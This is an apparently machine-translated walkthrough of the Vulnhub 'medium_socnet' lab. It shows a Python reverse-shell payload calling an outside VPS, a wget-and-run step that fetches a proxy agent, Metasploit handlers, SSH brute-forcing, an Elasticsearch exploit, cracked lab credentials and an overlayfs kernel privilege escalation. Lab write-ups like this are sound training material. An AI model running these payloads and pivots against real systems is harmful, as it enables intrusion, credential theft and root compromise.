[vulhub shooting range] medium_socnet

Article directory

  • Environment build
  • collect message
    • Host discovery:
    • port scan
  • web penetration
    • (CVE-2019-14322) Pallets Werkzeug 0.15.4 path traversal vulnerability
    • Code Injection – Bounce Shell
    • About Dockerfile
    • Determine whether it is in the Docker environment:
      • Command Shell upgrade to Meterpreter
      • method one
      • Method Two
  • There is an intranet environment in the Docker environment
    • Intranet host detection
    • shell script -ping survival ip
    • Intranet penetration – local msf automation
    • Manual public network vps intranet penetration
      • Venom Proxy
  • Vulnerability Exploitation-Kernel Privilege Escalation-Attack Code Modification
  • Thoughts and Questions
  • refer to


Keywords: host discovery, port scanning, service discovery, path crawling, code injection, shell script, intranet information collection, intranet penetration, exploit, password cracking, local privilege escalation, attack code modification

Environment construction

Official website download address (download is slow): https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
Target machine Baidu cloud link
When I built it for the first time, I carried out host detection and found that the target machine only opened 22 ssh services. I wondered if the ssh blasting would be over. After checking the information, I found that the target machine should also open port 5000. Then re-downloaded and imported once before it was normal (there is also a situation where even the host cannot be detected, it may be a problem with the network adapter settings)

Information collection

Host Discovery:

arp-scan -l

Port scanning

nmap -sS -sV -T4 -A -p- 10.10.10.154

Two ways of thinking: 1. ssh blasting 2. Web service built by Python on port 5000
ssh blasting: see luck

use auxiliary/scanner/ssh/ssh_login
set rhost 10.10.10.154
set USER_FILE user.txt
set PASS_FILE pass.txt
run

Web penetration

scan dirsearch

python3 dirsearch.py -u http://10.10.10.154:5000/ -e html js

Inserted a bit xss unanalyzed
Based on the information detected by the service

5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
|_http-title: Leave a message
Find related vulnerabilities on the Internet to correspond to the version

(CVE-2019-14322) Pallets Werkzeug 0.15.4 path traversal vulnerability

Search for Werkzeug historical vulnerabilities and found this
In Pallets Werkzeug prior to 0.15.5, shareddatmiddleware mishandled drive names in Windows pathnames.
Tried Poc, the vulnerability does not exist

Code injection – reverse shell


According to the page prompt, there may be code execution here
Rebound shell platform: https://forum.ywhack.com/shell.php

The target machine is a Python environment, try to inject the Python version to reverse the shell command


Another problem is that the codes given here are all executed in the form of command lines to go online, but the prompt given on the target machine page is executed by the exec() function, and the shell cannot be rebounded if copied directly.


The middle parameter part with guaranteed quantity can be launched normally

Payload

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("47.94.xx.xx",5566));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

In Python, semicolons can also be used to separate multiple statements; in this code, semicolons are used to put multiple statements on one line, so that only one line of code needs to be copied and pasted when executing the code
After executing the relevant command, the Dockerfile file is found, which means that the web service opened on port 5555 may be in Docker

About Dockerfile

Dockerfile defines the image and relies on the image to run the container, so the Dockerfile is the key to the image and the container
Dockerfile is a text file, which contains a series of instructions (Instruction), each instruction builds a layer, so the content of each instruction is to describe how the layer should be built

Judge whether it is in the Docker environment:

Method 1: Determine the .dockerenv file in the root directory

ls -alh /.dockerenv #Non-docker environment, without this .dockerenv file


Method 2: Query the cgroup information of the system process

cat /proc/1/cgroup

The Docker environment is executed as follows

The non-Docker environment is as follows

Real Hammer Dokcer Environment

Command Shell upgrade to Meterpreter

Because msf is more convenient. So transfer the shell to msf

msf6> use exploit/multi/handler
msf6 exploit(multi/handler) > set payload cmd/unix/reverse_bash
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 6677
msf6 exploit(multi/handler) > exploit

Another window listens to the local port 6677, and uses nc to bounce back again

Now there is only one shell, but how can I use other functions of msf? Upgrade Command Shell to Meterpreter

Method 1

sesssions -u 1


But it’s a pity here that the upgrade was not successful on the public network vps
Test the same LAN kali Yes

Method 2

msf6 exploit(multi/handler) > use post /multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > exploit

There is still no success in upgrading here. I guess it may be a problem with the public network vps I use. Using local kali can be used

There is an intranet environment in the Docker environment

Intranet host detection

ip a


The subnet mask here has 16 bits, which means that the number of hosts is at most 2 to the 16th power

shell script – ping survival ip

for i in $(for j in $(seq 1 254));do ping -c 1 172.17.$i.$j;done #Scan 65535 hosts

Because it is a Docker environment, so many mirrors will not be opened, so only the IP of the c segment is scanned

for i in $(seq 1 254);do ping -c 1 172.17.0.$i;done


Three hosts have survived except their own 172.17.0.2, and the remaining two are 172.17.0.1 and 172.17.0.3
Because other tools cannot be used for intranet penetration directly from the bounced bash, here we use a proxy

Intranet penetration – local msf automation

Automatically add routes


add proxy

use auxiliary/server/socks_proxy
set SRVPORT 1234

Modify the proxychains configuration file

vi /etc/proxychains.conf


Then use proxychains for subsequent operations

Local kali service detection is much faster than through vps

proxychains nmap -sV -sT 172.17.0.1


proxychains nmap -sV -sT 172.17.0.2


Pay attention to the http service opened on port 9200 here

proxychains nmap -sV -sT 172.17.0.3


There are still many questions here?

  • Both hosts 1 and 3 have port 5000 and the same service. Which one is the intranet ip of 10.10.154?
  • And what is the network structure in the intranet environment built using Docker?

Use the built-in firefox conditional socks proxy in local kali to access port 5000 of hosts 1 and 3 and port 9200 of host 2

Cooperate with visiting 10.10.10.154 on the physical machine and leaving a message, and found that 1 and 3 both correspond to this website

Access 172.17.0.2:9200 port

Find the public elasticsearch version 1.4.2 historical vulnerability online
Find EXP to use directly
https://github.com/t0kx/exploit-CVE-2015-1427

Directly root but this is a POC seems
EXP can be found in msf

searchsploit elasticsearch


proxychains python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.2


Get some users and md5 encrypted passwords, put them in cmd5.com for decryption

Can be decrypted, some need to pay…
The one that can log in is john:1337hack
Here you can use ssh to log in directly
After ssh login, it is found that it is a normal user authority

==entitlement==

Manual public network vps intranet penetration

Venom Proxy

https://github.com/Dliv3/Venom

Venom is a multi-level proxy tool developed in Go designed for penetration testers.
Venom can connect multiple nodes, and then use the nodes as a springboard to build multi-level agents.
Penetration testers can use Venom to easily proxy network traffic to multi-layer intranets and manage proxy nodes easily.

Open the server (VPS)

./admin_linux_x64 -lport 7777

Python starts a temporary http service, downloads and executes it through a file on the target machine

python3 -m http.server 88 #Note to execute in the Venom file directory

Execute in the target machine shell

wget http://47.94.130.42:88/agent_linux_x64
chmod +x agent_linux_x64
./agent_linux_x64 -rhost 47.94.130.42 -rport 7777 #Start the client


The server is successfully connected, and a session is obtained, enter this session, and open a socks proxy

Of course, tools are still needed for traffic forwarding. The Linux platform uses proxychains
For windows proxy details, see Proxy Socks Protocol & amp; Routing does not go online & amp; Post-infiltration communication & amp; CS-MSF control goes online
Here I use local kali to connect to the Socks proxy enabled by vps (tools are convenient)
Modify the configuration file:

vim /etc/proxychains.conf


proxychains nmap -sV -sT 172.17.0.1

The port range is not specified here, so scan some common services and ports

proxychains nmap -sV -sT 172.17.0.1 -p 1-65535 #p parameter can specify the port range


Just scan for a minute or two. If you don’t go through the public network proxy, the speed may be faster. Of course, in the real environment, you need to control the scanning rate to prevent the proxy ip from being blocked. The subsequent penetration steps are equivalent to the msf automation above. No more demos

Vulnerability Exploitation-Kernel Privilege Escalation-Attack Code Modification


Here I uploaded les.sh for analysis, looking for exploitable loopholes, the classic Dirty Cow I used at the beginning, when compiling, I found that there is no gcc compiler on the target machine, and of course there is no permission for package management (install gcc ), I wonder if there are other compilers to use, such as clang or tcc, to compile my own exploit program, of course there is no one, so what if I compile it locally into an executable program and upload it? We all know that programs compiled by different Linux architectures cannot be used universally (different instruction sets). Check the information on the Internet. GCC supports compiling programs of multiple architectures on one computer at the same time, which means that programs compiled on the X86 architecture using the GCC compiler can also run on the ARM architecture. So I uploaded the dirty cow vulnerability compiled locally by kali to the target machine
It shows that the libstdc++ library is missing, try apt-get install libstdc++ 6, the answer is no permission , so can you copy the library file from kali and use it? The copied file needs to be placed in the /usr/lib/ directory, otherwise the program cannot be called normally, but this directory is prohibited from being accessed by ordinary users. I am desperate, yes, I saw the attack code modification prompted by the shooting range, and suddenly thought of changing the dirty cow source code to call the library file I placed, and then recompiling and using it seems to be possible. But I don’t have enough internal skills, I was at a loss after looking at the C language source code for a while… (There is no trace of library exploitation in the source code of Dirty Cow EXP, let’s replace other vulnerabilities to elevate rights)

**This is a vulnerability exploited by other big guys ‘overlayfs’ Local Privilege Escalation **
Applicable linux kernel version: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)
The position of EXP in kali

/usr/share/exploitdb/exploits/linux/local/37292.c


Delete part of the ghost code, compile it in kali, it is normal to report an error, and the program will also be generated
According to the above idea, locate the ofs-lib.so file and pack it together and place it in the target machine, and execute it after empowering

locate ofs-lib.so
/usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so

Thoughts and questions

Unskilled in exploiting msf exploits
Not familiar with building an intranet environment with Docker
After seeing the docker environment, I didn’t try some escape methods, because I saw that the introduction of the target machine did not include the keyword escape, and I should try to escape in the real environment.
The level of modifying EXP is not enough, and I am not familiar with the calling of library files and the compilation process
One target drone for one day emmm
If the content of the article is insufficient, it will be supplemented later

Reference

https://www.freebuf.com/articles/web/321995.html

 2023-3-24 Memorial by whgojp